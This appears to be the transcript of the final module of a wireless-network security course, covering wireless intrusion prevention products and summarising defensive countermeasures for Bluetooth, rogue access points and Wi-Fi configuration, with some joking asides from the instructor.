So, we finally talk about tools. I'm going to give you kind of a 10,000-foot view here of the tools you should be utilizing, as well as some of my own personal favorites. Some of the tools are software based, some of them are hardware based. And let's face it, if you don't have a tool, you're a fool. See? I'm a poet and I didn't know it. I made a rhyme, I'm so fine. I'm going to start rapping here in a second. (laughs) We've talked about previously what we refer to as WIPS, or wireless intrusion prevention systems. These are typically made up of several components that actually work together to help give you a great and complete monitoring solution. Those things can include the ability to monitor access points, or put them in monitoring mode so we can see what's going on the network, as well as looking at suspicious traffic. Cisco makes a great product that's based off the Cisco discovery protocol, where they include a central point of alarm integration for all their controllers. They have a local mode for APs which provides a wireless service to clients in addition to doing time-sliced rogue and location scanning. There's other software out there, including products like AirMagnet and Zenworks, which has a great plug-in for WIPS. There's also AirTight, and a currently active open project called OpenWIPS-ng, and I'll bet you'll never guess who's behind that one. And I'm sure that some of you already have some solutions in place. My big thing for you is make sure you keep these things up to date and don't get complacent with them. As far as hardware is concerned, I did find an easy solution; it's actually quite simple. You can get it on Amazon, even with Prime shipping, for about $35. It's called the Bat. Some people refer to this as a low-tech solution, but if I find somebody's trying to hack my Wi-Fi network, I simply break it out, make eye contact, and chase after them. Of course, if things get really bad you can always just throw up the signal as well. Da, da, da, daaaa, da! (sings Batman theme)

Summary

So in this module, we went through and took a look at several different countermeasures. We talked about the countermeasures for Bluetooth. If you recall, we talked about things like stop using default PINs, and disable it when you don't need it. Check your paired devices, as well as the obvious: don't accept unexpected requests. Trust me, this isn't like a social networking platform where I'm trying to get as many friends as possible. I want to limit the number of devices, or at least make sure I'm aware of who they are. We also talked about the countermeasures for rogue access points, and that included, obviously, scanning for access points 24/7. Remember, we even talked about reusing old APs, putting them in monitoring mode so we can see when new access points come into our environment. And of course, we talked about what to do when you find the rogue AP. Remember, you pull it, ask questions later, and then accidentally drop it and stumble and step on it several times. We then went and took a look at the 6 layers of wireless security, which included things like monitoring the wireless signal, handling data protection via WPA2 and AES, using strong authentication at the network protection level, and believe it or not, yes, the firewall at the end-user level. Then we talked about some of our best practices, both for configuration as well as authentication and the SSID settings. And finally, we talked about some of our favorite tools out there, and most of those tools will provide you with a 30- or 60-day evaluation. Just make sure the tool meets the needs of the requirements for your company. The bat always meets the requirement of my company. So that's going to conclude our hacking wireless networks course. I really hope you guys enjoyed it. I hope you learned something, but better yet, I hope you go implement something that you've learned. Thanks a lot.
